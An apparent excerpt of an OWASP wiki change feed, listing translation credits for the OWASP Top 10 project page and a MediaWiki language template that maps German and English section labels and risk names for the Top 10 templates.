*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232191</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232191"/>
				<updated>2017-08-11T19:55:18Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: typo&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==This page is outdated. It is part of the Top 10-2017 RC1 which has been rejected.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==If you wish to comment, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. Changes to this page will be lost!==&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==More information available [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2017_Release_Candidate_1 here].==&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
